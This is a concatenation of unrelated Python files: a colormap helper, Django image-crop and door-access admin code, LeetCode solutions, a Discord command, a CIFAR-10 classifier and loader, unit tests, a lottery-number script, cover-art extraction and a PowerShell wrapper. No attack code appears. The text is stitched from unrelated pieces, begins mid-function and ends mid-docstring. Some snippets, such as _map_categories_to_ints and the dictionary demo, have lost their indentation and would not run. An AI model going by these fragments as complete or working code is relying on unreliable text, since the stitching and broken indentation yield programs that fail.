
    # Pick the best available sequential default at call time
    # ('inferno' only exists on matplotlib >= 1.5).
    if hasattr(cm, 'inferno'):
        DEF_SEQUENTIAL = 'inferno'
    else:
        DEF_SEQUENTIAL = 'BrBG'

    # strip units
    units = None  # TODO: build a color bar with units
    if hasattr(cats[0], 'magnitude'):
        # Unit-bearing quantities: color by the bare magnitudes.
        arr = u.array(cats)
        units = arr.units
        cats = arr.magnitude
        is_categorical = False
    else:
        # Non-numeric entries are treated as category labels.
        is_categorical = not isinstance(cats[0], (float, int))
    if categorical is not None:
        # Explicit caller choice overrides the auto-detection above.
        is_categorical = categorical

    if is_categorical:
        values = _map_categories_to_ints(cats)
        if mplmap == 'auto':
            mplmap = DEF_CATEGORICAL
    else:
        values = np.array(list(map(float, cats)))
        if mplmap == 'auto':
            mplmap = DEF_SEQUENTIAL

    rgb = _cmap_to_rgb(mplmap, values)
    hexcolors = [webcolors.rgb_to_hex(np.array(c)) for c in rgb]
    return hexcolors
def _map_categories_to_ints(cats):
values = np.zeros(len(cats), dtype='float')
to_int = collections.OrderedDict()
for i, item in enumerate(cats):
if item not in to_int:
to_int[item] = len(to_int)
values[i] = to_int[item]
return values
def _cmap_to_rgb(mplmap, values):
    """Map numeric values through a named matplotlib colormap to RGB triples.

    :param mplmap: name of a colormap attribute on matplotlib.cm
    :param values: 1-D numpy array of numeric values
    :return: list of [r, g, b] integer triples in the range 0-255
    """
    from matplotlib import cm
    cmap = getattr(cm, mplmap)
    mx = values.max()
    mn = values.min()
    if mx == mn:
        # Fixed: the original divided by zero when all values were equal;
        # map a degenerate range to the low end of the colormap.
        cat_values = np.zeros_like(values, dtype='float')
    else:
        cat_values = (values - mn) / (mx - mn)  # rescale values [0.0,1.0]
    rgba = cmap(cat_values)  # array of RGBA values in range [0.0, 1.0]
    # Strip the alpha field and rescale to [0,255] RGB integers.
    # Fixed: clamp to 255 — the original's int(c*256.0) produced the
    # out-of-range value 256 for channels exactly equal to 1.0.
    rgb = [[min(int(channel * 256.0), 255) for channel in c[:3]] for c in rgba]
    return rgb
def is_color(s):
    """ Do our best to determine if "s" is a color spec that can be converted to hex

    Args:
        s (str or int): string or integer describing a color

    Returns:
        bool: True if this can be converted to a hex-compatible color
    """
    def in_range(i):
        return 0 <= i <= int('0xFFFFFF', 0)

    try:
        # `and not bool` keeps the original behavior: True/False are not colors
        # (the original used `type(s) == int`, which excludes bool).
        if isinstance(s, int) and not isinstance(s, bool):
            return in_range(s)
        elif not isinstance(s, (str, bytes)):
            return False
        elif s in webcolors.css3_names_to_hex:
            return True
        elif s[0] == '#':
            return in_range(int('0x' + s[1:], 0))
        elif s[0:2] == '0x':
            return in_range(int(s, 0))
        elif len(s) == 6:
            return in_range(int('0x' + s, 0))
    except ValueError:
        return False
    # Fixed: the original fell off the end and returned None for strings
    # matching no branch; the documented contract is a bool.
    return False
|
## -*- coding: utf-8 -*- ####################################################
from django.conf import settings
from django.utils.translation import ugettext
from image_editor.filters.basic import ImageEditToolBasic
#CROP_RATIO
class ImageCropTool(ImageEditToolBasic):
    """Image-editor tool that crops an image using the jCrop jQuery widget."""

    class Media:
        # Client-side assets required by the crop widget.
        js = ('jcrop/js/jquery.Jcrop.min.js', 'jcrop/js/cropper.js')
        css = { 'all': ('jcrop/css/jquery.Jcrop.css', ) }

    def render_button(self, attrs, filter_name):
        # Button markup plus an inline script wiring jCrop to this widget id.
        return """
<img src="%(static_url)s%(image_url)s" style="margin: 6px;" /><br/>%(filter_title)s \
<script>
$(function(){
$("#%(id)s_button_crop").cropper(
"%(id)s",
%(options)s
);
});
</script>
""" % \
        {
            'static_url': settings.STATIC_URL or settings.MEDIA_URL,
            'image_url': 'image_editor/img/crop.png',
            'id': attrs['id'],
            'filter_title': ugettext('Crop'),
            'options': self.options
        }

    def render_initial(self, attrs, filter_name):
        # The crop tool renders nothing until the user activates it.
        return ""

    def proceed_image(self, image, params):
        """Crop `image` to the rectangle supplied in widget coordinates.

        The widget reports coordinates relative to the preview size
        (params['width'] x params['height']); they are rescaled to the
        real image size before cropping.
        """
        width, height = image.size
        x_coef = float(width) / float(params['width'])
        y_coef = float(height) / float(params['height'])
        image = image.crop((
            int(params['x'] * x_coef), int(params['y'] * y_coef), int(params['x2'] * x_coef), int(params['y2'] * y_coef)))
        return image
from django.contrib import admin
from doors.keymaster.models import *
class KeymasterAdmin(admin.ModelAdmin):
    """Admin for Keymaster, adding a bulk 'force sync' action."""

    def force_sync(self, request, queryset):
        # Flag each selected keymaster so the gatekeeper re-syncs on its
        # next contact, then confirm to the admin user.
        for km in queryset:
            km.force_sync()
        self.message_user(request, "Sync will be forced on next contact from the gatekeeper")

    list_display = ('description', 'gatekeeper_ip', 'access_ts', 'success_ts', 'sync_ts', 'is_enabled')
    search_fields = ('gatekeeper_ip', 'is_enabled')
    actions = ["force_sync", ]
class DoorEventAdmin(admin.ModelAdmin):
    """Read-oriented admin for door events, newest first."""
    list_display = ('timestamp', 'door', 'event_type', 'user', 'code', 'event_description', )
    list_filter = ('door', 'event_type', )
    search_fields = ('user', 'code')
    ordering = ['-timestamp']
# Register the door-access models with the admin site; models without a
# custom ModelAdmin get the default one.
admin.site.register(Keymaster, KeymasterAdmin)
admin.site.register(DoorEvent, DoorEventAdmin)
admin.site.register(Door)
admin.site.register(DoorCode)
admin.site.register(GatekeeperLog)
# Copyright 2020 Office Nomads LLC (https://officenomads.com/) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://opensource.org/licenses/Apache-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
|
'''
泰波那契序列 Tn 定义如下:
T0 = 0, T1 = 1, T2 = 1, 且在 n >= 0 的条件下 Tn+3 = Tn + Tn+1 + Tn+2
给你整数 n,请返回第 n 个泰波那契数 Tn 的值。
示例 1:
输入:n = 4
输出:4
解释:
T_3 = 0 + 1 + 1 = 2
T_4 = 1 + 1 + 2 = 4
示例 2:
输入:n = 25
输出:1389537
提示:
0 <= n <= 37
答案保证是一个 32 位整数,即 answer <= 2^31 - 1。
'''
from leetcode.tools.time import printTime
class Solution:
    """Tribonacci via 3x3 matrix fast exponentiation, O(log n) multiplications."""

    @printTime()
    def tribonacci(self, n: int) -> int:
        """Return T(n) where T0=0, T1=1, T2=1 and T(n+3)=T(n)+T(n+1)+T(n+2)."""
        # Column vector holding (T0, T1, T2).
        seed = [[0], [1], [1]]
        if n < 3:
            return seed[n][0]

        def mat_mul(a, b):
            # Plain (p x q) @ (q x r) integer matrix product.
            rows, cols, inner = len(a), len(b[0]), len(a[0])
            out = [[0] * cols for _ in range(rows)]
            for r in range(rows):
                for c in range(cols):
                    acc = 0
                    for t in range(inner):
                        acc += a[r][t] * b[t][c]
                    out[r][c] = acc
            return out

        def step_power_times_seed(k):
            # Binary exponentiation of the companion (step) matrix,
            # then apply it to the seed vector.
            step = [[0, 1, 0],
                    [0, 0, 1],
                    [1, 1, 1]]
            acc = [[1, 0, 0],
                   [0, 1, 0],
                   [0, 0, 1]]
            while k:
                if k & 1:
                    acc = mat_mul(acc, step)
                step = mat_mul(step, step)
                k >>= 1
            return mat_mul(acc, seed)

        # After k = n - 2 steps, the last row of the product holds T(n).
        return step_power_times_seed(n - 2)[2][0]
Solution().tribonacci(3)
'''
[0, 1, 0] Fn Fn + 1
[0, 0, 1] Fn + 1 Fn + 2
[1, 1, 1] Fn + 2 Fn + 3
''' |
import discord
import time
import datetime
import asyncio
import random
from discord.ext import commands
from random import randint
class Games():
    """Game-related chat commands.

    NOTE(review): `bot.say` and plain (non-Cog) command classes are the
    pre-1.0 "async" discord.py API — confirm the pinned library version
    before modernizing.
    """
    def __init__(self, bot):
        # The bot instance is kept so commands can reply through it.
        self.bot = bot

    @commands.command()
    async def choose(self, *choices : str):
        """Chooses Between Multiple Choices!"""
        await self.bot.say(random.choice(choices))
def setup(bot):
    # discord.py extension entry point: registers the Games cog on load.
    bot.add_cog(Games(bot))
|
# Minci
# time elapsed: 37 min
# submitted 2 times
class Solution:
    def calculate(self, s: str) -> int:
        """Evaluate a basic arithmetic expression with +, -, *, / and spaces.

        Operands are non-negative integers; * and / bind tighter than + and -.
        Division truncates toward zero, which matches the original's floor
        division because every individual division here has non-negative
        operands (signs are carried on the stack, outside the division).

        Improvement over the original: a single O(n) stack pass replaces the
        repeated whole-list scans with pop() calls, which were O(n^2) overall
        and crashed on leading operators produced by the split step.
        """
        stack = []          # signed terms; their sum is the final answer
        num = 0             # operand currently being read
        pending_op = '+'    # operator waiting to be applied to `num`
        for i, ch in enumerate(s):
            if ch.isdigit():
                num = num * 10 + int(ch)
            # Apply the pending operator when the next operator (or the end
            # of the string) is reached; spaces simply fall through.
            if ch in '+-*/' or i == len(s) - 1:
                if pending_op == '+':
                    stack.append(num)
                elif pending_op == '-':
                    stack.append(-num)
                elif pending_op == '*':
                    stack.append(stack.pop() * num)
                else:  # '/': truncate toward zero (see docstring)
                    stack.append(int(stack.pop() / num))
                if ch in '+-*/':
                    pending_op = ch
                num = 0
        return sum(stack)
# Quick manual check: 3 + 5/2 -> 3 + 2 -> 5 (integer division).
sol = Solution()
sol.calculate("3+5/2")
import logging
from celery.utils.log import get_task_logger
from lms.lmstests.sandbox.config.celery import app
from lms.lmstests.sandbox.linters import base
# Celery task logger; INFO level so per-solution progress reaches the worker log.
_logger: logging.Logger = get_task_logger(__name__)
_logger.setLevel(logging.INFO)
@app.task
def run_linters_in_sandbox(solution_file_id: str, code: str, file_suffix: str):
    """Celery task: run the matching linter on one solution file in the sandbox.

    :param solution_file_id: identifier of the solution file being checked
    :param code: the source code to lint
    :param file_suffix: file extension used to select the appropriate linter
    :return: the linter's findings, or [] when no linter matches or the
        check itself fails
    """
    _logger.info('Start running sandbox check solution %s', solution_file_id)
    get_linter = base.BaseLinter.get_match_linter
    try:
        checker = get_linter(_logger, code, file_suffix, solution_file_id)
    except NotImplementedError:
        # A linter subclass is missing a required core method — surface it
        # loudly rather than silently skipping the check.
        _logger.info('All linters must implement BaseLinter core methods.')
        raise
    if checker is None:
        _logger.info('No suitable linter for file %s', solution_file_id)
        return []
    checker.initialize()
    try:
        return checker.run_check()
    except Exception:  # NOQA: B902
        # Deliberate best-effort: a crashing linter must not fail the task.
        _logger.exception("Can't check solution %s", solution_file_id)
        return []
|
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, Flatten, Dropout, Dense, BatchNormalization, MaxPooling2D
from keras.models import Model
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sklearn.metrics import confusion_matrix
# Load CIFAR-10 and scale pixel values into [0, 1].
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
# Labels arrive shaped (n, 1); flatten for sparse categorical loss.
y_train = y_train.flatten()
y_test = y_test.flatten()
print('x_train.shape, y_train.shape, x_test.shape, y_test.shape', x_train.shape, y_train.shape, x_test.shape, y_test.shape)

# convolution expects height, width, color
# number of classes
K = len(set(y_train))
print(f"Num of classes {K}")

# Build model: three conv blocks (32 -> 64 -> 128 filters), each Conv2D
# followed by batch norm, with 2x2 max-pooling between blocks.
i = Input(shape=x_train[0].shape)
x = Conv2D(32, (3, 3), activation='relu', padding='same')(i)
x = BatchNormalization()(x)
x = Conv2D(32, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(1024, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(K, activation='softmax')(x)
# Fixed: build the model with tf.keras. The original used `Model` imported
# from the standalone `keras` package, and mixing standalone-keras models
# with tf.keras layers/tensors fails on most version combinations.
model = tf.keras.Model(i, x)

# compile the model
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])

# Train with light data augmentation (shifts + horizontal flips).
batch_size = 32
data_generator = tf.keras.preprocessing.image.ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True)
train_generator = data_generator.flow(x_train, y_train, batch_size)
steps_per_epoch = x_train.shape[0] // batch_size
r = model.fit(train_generator, validation_data=(x_test, y_test), steps_per_epoch=steps_per_epoch, epochs=50)

# Loss and accuracy curves.
plt.plot(r.history['loss'], label='loss')
plt.plot(r.history['val_loss'], label='val_loss')
plt.legend()
plt.show()
plt.plot(r.history['accuracy'], label='acc')
plt.plot(r.history['val_accuracy'], label='val_acc')
plt.legend()
plt.show()

# Confusion matrix on the test set.
p_test = model.predict(x_test).argmax(axis=1)
cm = confusion_matrix(y_test, p_test)
plt.figure(figsize=(10,10))
sns.heatmap(data=cm, annot=True)
plt.show()

# Show one randomly chosen misclassified image with its labels.
labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
misclassified_idx = np.where(p_test != y_test)[0]
i = np.random.choice(misclassified_idx)
plt.imshow(x_test[i], cmap='gray')
plt.title("True label: %s Predicted: %s" % (labels[y_test[i]], labels[p_test[i]]))
plt.show()
|
from numpy import *
from numpy.linalg import *

# Solve the 3x3 linear system  bac . qtd = vet  for the bacteria amounts.
# NOTE(review): eval() on raw user input executes arbitrary expressions —
# consider ast.literal_eval for a safe literal parse.
bac = array([[2, 1, 4], [1, 2, 0], [2, 3, 2]])
vet = array(eval(input("Vetor: ")))
vet = vet.T
qtd = dot(inv(bac), vet)
nomes = ("estafilococo", "salmonela", "coli")
for nome, valor in zip(nomes, qtd):
    print(nome + ": ", round(valor, 1))
# Report the scarcest bacterium; argmin keeps the original if/elif
# tie-breaking (first minimum wins).
print(nomes[qtd.argmin()])
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource_py3 import SubResource
# NOTE: AutoRest-generated model — keep field names/keys in sync with the
# 2018-04-01 network API; manual edits are lost on regeneration.
class LoadBalancingRule(SubResource):
    """A load balancing rule for a load balancer.
    All required parameters must be populated in order to send to Azure.
    :param id: Resource ID.
    :type id: str
    :param frontend_ip_configuration: A reference to frontend IP addresses.
    :type frontend_ip_configuration:
     ~azure.mgmt.network.v2018_04_01.models.SubResource
    :param backend_address_pool: A reference to a pool of DIPs. Inbound
     traffic is randomly load balanced across IPs in the backend IPs.
    :type backend_address_pool:
     ~azure.mgmt.network.v2018_04_01.models.SubResource
    :param probe: The reference of the load balancer probe used by the load
     balancing rule.
    :type probe: ~azure.mgmt.network.v2018_04_01.models.SubResource
    :param protocol: Required. Possible values include: 'Udp', 'Tcp', 'All'
    :type protocol: str or
     ~azure.mgmt.network.v2018_04_01.models.TransportProtocol
    :param load_distribution: The load distribution policy for this rule.
     Possible values are 'Default', 'SourceIP', and 'SourceIPProtocol'.
     Possible values include: 'Default', 'SourceIP', 'SourceIPProtocol'
    :type load_distribution: str or
     ~azure.mgmt.network.v2018_04_01.models.LoadDistribution
    :param frontend_port: Required. The port for the external endpoint. Port
     numbers for each rule must be unique within the Load Balancer. Acceptable
     values are between 0 and 65534. Note that value 0 enables "Any Port"
    :type frontend_port: int
    :param backend_port: The port used for internal connections on the
     endpoint. Acceptable values are between 0 and 65535. Note that value 0
     enables "Any Port"
    :type backend_port: int
    :param idle_timeout_in_minutes: The timeout for the TCP idle connection.
     The value can be set between 4 and 30 minutes. The default value is 4
     minutes. This element is only used when the protocol is set to TCP.
    :type idle_timeout_in_minutes: int
    :param enable_floating_ip: Configures a virtual machine's endpoint for the
     floating IP capability required to configure a SQL AlwaysOn Availability
     Group. This setting is required when using the SQL AlwaysOn Availability
     Groups in SQL server. This setting can't be changed after you create the
     endpoint.
    :type enable_floating_ip: bool
    :param disable_outbound_snat: Configures SNAT for the VMs in the backend
     pool to use the publicIP address specified in the frontend of the load
     balancing rule.
    :type disable_outbound_snat: bool
    :param provisioning_state: Gets the provisioning state of the PublicIP
     resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
    :type provisioning_state: str
    :param name: The name of the resource that is unique within a resource
     group. This name can be used to access the resource.
    :type name: str
    :param etag: A unique read-only string that changes whenever the resource
     is updated.
    :type etag: str
    """
    # Azure rejects the payload unless these two fields are present.
    _validation = {
        'protocol': {'required': True},
        'frontend_port': {'required': True},
    }
    # Maps Python attribute names to REST payload paths for the serializer.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'frontend_ip_configuration': {'key': 'properties.frontendIPConfiguration', 'type': 'SubResource'},
        'backend_address_pool': {'key': 'properties.backendAddressPool', 'type': 'SubResource'},
        'probe': {'key': 'properties.probe', 'type': 'SubResource'},
        'protocol': {'key': 'properties.protocol', 'type': 'str'},
        'load_distribution': {'key': 'properties.loadDistribution', 'type': 'str'},
        'frontend_port': {'key': 'properties.frontendPort', 'type': 'int'},
        'backend_port': {'key': 'properties.backendPort', 'type': 'int'},
        'idle_timeout_in_minutes': {'key': 'properties.idleTimeoutInMinutes', 'type': 'int'},
        'enable_floating_ip': {'key': 'properties.enableFloatingIP', 'type': 'bool'},
        'disable_outbound_snat': {'key': 'properties.disableOutboundSnat', 'type': 'bool'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
    }
    def __init__(self, *, protocol, frontend_port: int, id: str=None, frontend_ip_configuration=None, backend_address_pool=None, probe=None, load_distribution=None, backend_port: int=None, idle_timeout_in_minutes: int=None, enable_floating_ip: bool=None, disable_outbound_snat: bool=None, provisioning_state: str=None, name: str=None, etag: str=None, **kwargs) -> None:
        # SubResource stores `id`; everything else is kept on this instance.
        super(LoadBalancingRule, self).__init__(id=id, **kwargs)
        self.frontend_ip_configuration = frontend_ip_configuration
        self.backend_address_pool = backend_address_pool
        self.probe = probe
        self.protocol = protocol
        self.load_distribution = load_distribution
        self.frontend_port = frontend_port
        self.backend_port = backend_port
        self.idle_timeout_in_minutes = idle_timeout_in_minutes
        self.enable_floating_ip = enable_floating_ip
        self.disable_outbound_snat = disable_outbound_snat
        self.provisioning_state = provisioning_state
        self.name = name
        self.etag = etag
import unittest
# 4L de jacky
# le compteur kilométrique de la 4L de jacky est tout neuf
# quand le compteur affiche 222222 on retourne True
# quand le compteur affiche 444444 on retourne True
# quand le compteur affiche 738922 on retourne False
# quand le compteur affiche 051968 on retourne True
from Odometer import Odometer, is_interesting
class OdometerTest(unittest.TestCase):
    """Tests for is_interesting(): a reading is interesting when all six
    digits are identical, when it reads 051968 (May 1968), or when the
    digits 69 appear in it.

    FIX: replaced assertEqual(x, True/False) with the idiomatic
    assertTrue/assertFalse, which also produce clearer failure messages.
    """

    def test_that_all_figures_are_the_same(self):
        # Repdigit readings fill all six digits with the same figure.
        self.assertTrue(is_interesting(Odometer(222222)))
        self.assertTrue(is_interesting(Odometer(111111)))
        self.assertTrue(is_interesting(Odometer(333333)))
        self.assertTrue(is_interesting(Odometer(555555)))

    def test_that_all_figures_are_not_interesting_if_do_not_fill_odometer_length(self):
        # Four identical digits are not enough on a six-digit odometer.
        self.assertFalse(is_interesting(Odometer(5555)))

    def test_that_boring_numbers_arent_interesting(self):
        self.assertFalse(is_interesting(Odometer(738922)))
        self.assertFalse(is_interesting(Odometer(123458)))
        self.assertFalse(is_interesting(Odometer(628333)))
        self.assertFalse(is_interesting(Odometer(111112)))

    def test_that_may_1968_is_interesting(self):
        self.assertTrue(is_interesting(Odometer(51968)))

    def test_that_69_is_in_figures(self):
        self.assertTrue(is_interesting(Odometer(12698)))
        self.assertTrue(is_interesting(Odometer(69)))
# Allow running this test module directly with `python`.
if __name__ == '__main__':
    unittest.main()
|
from bert.preprocess import PAD_INDEX
from sklearn.metrics import f1_score, balanced_accuracy_score
import numpy as np
def mlm_accuracy(predictions, targets):
    """Masked-LM accuracy computed over non-padding target positions only."""
    mlm_predictions, _ = predictions
    mlm_targets, _ = targets
    # Only positions whose target is not the padding index count.
    mask = np.where(mlm_targets != PAD_INDEX)
    matches = np.equal(mlm_predictions[mask], mlm_targets[mask])
    return matches.mean()
def nsp_accuracy(predictions, targets):
    """Next-sentence-prediction accuracy: fraction of correct is-next calls."""
    _, nsp_predictions = predictions
    _, is_nexts = targets
    return np.equal(nsp_predictions, is_nexts).mean()
def classification_accuracy(predictions, targets):
    """Balanced (per-class averaged) accuracy of the classifier output."""
    return balanced_accuracy_score(targets, predictions)
def f1_weighted(predictions, targets):
    """Support-weighted F1 score over all classes."""
    return f1_score(targets, predictions, average='weighted')
|
# Importing the required libraries
import hashlib, json, sys
"""
def HashFunc(msg=""):
if type(msg) != str:
msg = json.dumps(msg,sort_keys=True)
if sys.version_info.major == 2:
return unicode(hashlib.sha256(msg).hexdigest(),'utf-8')
else:
return hashlib.sha256(str(msg).encode('utf-8')).hexdigest()
"""
# Here We are Creating an Dictionary
# The Dictionary has Key and Value
# Key = 'A' 'B' 'C' and Value 1,2,3
D = {}
D['A'] = 1
D['B'] = 2
D['C'] = 3
# Here we use a for loop to print the contents of Dicitonary
for k in D.keys():
print(D[k])
# Here we print both key value pair
for k,v in D.items():
print(k,v)
# Create Two Arrays for Key and Values
Key_Arr = {'M','O','N','K'}
Val_Arr = {10,20,30,40}
Hash_Var = {k:v for k,v in zip(Key_Arr,Val_Arr)}
Hash_Var
map(hash,Val_Arr)
hash('0')
hash_obj = hashlib.sha256(b'Hello')
hash_obj.hexdigest()
|
from random import randint
from time import sleep

dados = []     # numbers of the game currently being drawn
megasena = []  # one 6-number list per drawn game
print('=='*20)
print('{:^40}'.format('MEGA-SENA'))
print('=='*20)
n = int(input('Quantos jogos você quer que eu sorteie? '))
print(f'-=-=-=-=-= SORTEANDO {n} JOGOS -=-=-=-=-')
for c in range(1, n+1):
    for d in range(0, 6):
        # FIX: redraw until the number is unique within this game — the old
        # code redrew only once, so a game could still contain duplicates.
        # FIX: Mega-Sena balls run 1..60, so draw randint(1, 60), not (0, 60).
        n2 = randint(1, 60)
        while n2 in dados:
            n2 = randint(1, 60)
        dados.append(n2)
    # FIX: store a copy — appending `dados` itself and then clearing it left
    # `megasena` holding n references to the same (emptied) list.
    megasena.append(dados[:])
    print(f'Jogo {c}: {dados}')
    dados.clear()
    sleep(1)
print('=='*20)
import os
import pickle
import numpy as np
from sklearn.model_selection import train_test_split
"""This script implements the functions for reading data.
"""
def loadpickle(path):
    """Deserialize and return the pickled object stored at `path`.

    NOTE(review): pickle is unsafe on untrusted files — use only on local
    dataset batches you trust.
    """
    with open(path, 'rb') as handle:
        return pickle.load(handle, encoding='bytes')
def load_data(data_dir):
    """Load the CIFAR-10 dataset.
    Args:
        data_dir: A string. The directory where data batches
            are stored.
    Returns:
        x_train: An numpy array of shape [50000, 3072].
            (dtype=np.float32)
        y_train: An numpy array of shape [50000,].
            (dtype=np.int32)
        x_test: An numpy array of shape [10000, 3072].
            (dtype=np.float32)
        y_test: An numpy array of shape [10000,].
            (dtype=np.int32)
    """
    ### YOUR CODE HERE
    meta_data = loadpickle(data_dir + '/batches.meta')  # read but unused
    # Stack the five training batches into one (50000, 3072) matrix.
    batches = [loadpickle(data_dir + "/data_batch_" + str(i)) for i in range(1, 6)]
    # astype keeps the float64 dtype that vstack-onto-an-empty-float-array
    # produced in the previous formulation.
    x_train = np.vstack([batch[b'data'] for batch in batches]).astype(np.float64)
    y_train = np.array(sum((batch[b'labels'] for batch in batches), []))
    test_batch = loadpickle(data_dir + "/test_batch")
    x_test = test_batch[b'data']
    y_test = np.array(test_batch[b'labels'])
    ### END CODE HERE
    return x_train, y_train, x_test, y_test
def load_testing_images(data_dir):
    """Load the images in private testing dataset.
    Args:
        data_dir: A string. The directory where the testing images
            are stored.
    Returns:
        x_test: An numpy array of shape [N, 32, 32, 3].
            (dtype=np.float32)
    """
    ### YOUR CODE HERE
    # TODO: unimplemented stub — returns an empty list rather than the
    # [N, 32, 32, 3] float32 array the docstring promises; `data_dir`
    # is currently ignored.
    x_test = []
    ### END CODE HERE
    return x_test
def train_valid_split(x_train, y_train, train_ratio=0.8):
    """Split the original training data into a new training dataset
    and a validation dataset.
    Args:
        x_train: An array of shape [50000, 3072].
        y_train: An array of shape [50000,].
        train_ratio: A float number between 0 and 1.
    Returns:
        x_train_new: An array of shape [split_index, 3072].
        y_train_new: An array of shape [split_index,].
        x_valid: An array of shape [50000-split_index, 3072].
        y_valid: An array of shape [50000-split_index,].
    """
    ### YOUR CODE HERE
    # Delegates to sklearn; note the rows are shuffled (sklearn's default),
    # so "split_index" above refers only to the resulting sizes.
    parts = train_test_split(x_train, y_train, train_size=train_ratio)
    x_train_new, x_valid, y_train_new, y_valid = parts
    ### END CODE HERE
    return x_train_new, y_train_new, x_valid, y_valid
|
#! /usr/bin/env python
# coding = utf-8
import time, pickle, json

# Two sample dicts, serialized both ways for the read/write demos below.
d = {'a': 'b'}
c = {'d': 'e'}
p1, p2 = pickle.dumps(d), pickle.dumps(c)
j1, j2 = json.dumps(d), json.dumps(c)
def write2txt():
    """Write the two JSON strings to time.txt, separated by a newline."""
    with open('time.txt', 'w') as out:
        out.write(j1)
        out.write('\n')
        out.write(j2)
def readftxt():
    """Read time.txt and print each line parsed as JSON."""
    with open('time.txt', 'r') as f:
        for line in f.readlines():
            print(json.loads(line))
    # FIX: removed a second `for line in f.readlines()` loop that tried
    # pickle.loads() on str lines — the file was already exhausted, so it
    # never ran, and it would raise TypeError if it ever did.
# Entry point: demo the JSON round-trip.  The write step is commented out,
# so time.txt must already exist for readftxt() to succeed.
if __name__ == '__main__':
    # write2txt()
    readftxt()
|
def readAPIC(filename, artist, album, filetype):
    """Extract embedded cover art from an .m4a or .mp3 file and save it to
    images/<artist>-<album>.<ext>.

    Returns True when a cover image was written, False for unsupported
    filetypes.  NOTE(review): the scan is heuristic — it looks for the first
    PNG/JPEG byte signature after the 'covr'/'ID3' marker and assumes an
    embedded image is actually present.
    """
    import os

    # Pick the atom/tag marker that precedes cover data for this container.
    if filetype == '.m4a':
        covr = b'covr'
    elif filetype == '.mp3':
        covr = b'ID3'
    else:
        # FIX: reject unsupported types before opening the file — the old
        # code opened it first and leaked the handle on this early return.
        return False
    imagetype = '.png'
    # Try PNG first: its 8-byte signature is long, so false matches are rare.
    start = b'\x89\x50\x4E\x47\x0D\x0A\x1A\x0A'
    end = b'\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82'
    # FIX: `with` guarantees the file is closed (previously left to the GC).
    with open(filename, 'rb') as fp:
        a = fp.read()
    covr_num = a.find(covr)
    a = a[covr_num: -1]
    start_num = a.find(start)
    end_num = a.find(end)
    if start_num == -1:  # no PNG signature: assume JPEG
        start = b'\xFF\xD8'
        end = b'\xFF\xD9'
        start_num = a.find(start)
        end_num = a.find(end)
        imagetype = '.jpg'
    if imagetype == '.jpg':
        pic = a[start_num: end_num + 3]
        # Keep the innermost image when several signatures are nested.
        while pic[2: -1].find(start) != -1:
            pic = pic[pic[2: -1].find(start) + 2:-1]
    elif imagetype == '.png':
        pic = a[start_num: end_num + 12]
        while pic[8: -1].find(start) != -1:
            pic = pic[pic[8: -1].find(start) + 8:-1]
    # FIX: create the output directory if missing instead of crashing.
    os.makedirs('images', exist_ok=True)
    with open('images/' + artist + '-' + album + imagetype, 'wb') as fo:
        fo.write(pic)
    return True
|
import subprocess
class PowerShellInterface:
    """Thin wrapper around running PowerShell commands via subprocess
    (Windows only — requires `powershell` on PATH)."""

    def __init__(self):
        pass

    def runCommand(self, cmd):
        """Run `cmd` under powershell and return the CompletedProcess with
        stdout/stderr captured as bytes."""
        result = subprocess.run(["powershell", "-Command", cmd], capture_output=True)
        return result

    def _decode_stdout(self, res):
        # FIX: decode the captured bytes properly.  The old
        # str(res.stdout)[2:-3] sliced the bytes *repr* ("b'...\\r\\n'"),
        # which left a literal backslash-r in the text and corrupted any
        # output not ending in exactly \r\n.
        return res.stdout.decode("utf-8", errors="replace").rstrip("\r\n")

    def printTestCommandOutput(self):
        """Run a trivial Write-Host command and print its output."""
        testCommand = "Write-Host Hello World!"
        res = self.runCommand(testCommand)
        print(self._decode_stdout(res))

    def getCurrentClockSpeed(self):
        """Return 'current max' CPU clock speeds (MHz) as one text line,
        computed from PowerShell performance counters."""
        command = '''
        $MaxClockSpeed = (Get-CimInstance CIM_Processor).MaxClockSpeed
        $ProcessorPerformance = (Get-Counter -Counter "\Processor Information(_Total)\% Processor Performance").CounterSamples.CookedValue
        $CurrentClockSpeed = $MaxClockSpeed*($ProcessorPerformance/100)
        Write-Host $CurrentClockSpeed, $MaxClockSpeed
        '''
        res = self.runCommand(command)
        return self._decode_stdout(res)
|
import subprocess
import re
from json import JSONEncoder, JSONDecoder
IFACE_STATUS_REGEX = re.compile(r"^[0-9]+:\s([a-zA-Z0-9]+):\s<([A-Za-z,-_]+)>.+state\s((DOWN|UP)).*")
class IFaceError(Exception):
pass
def check_interface_up(interface_name):
    """Return True when `interface_name` is up (by state or by flags).

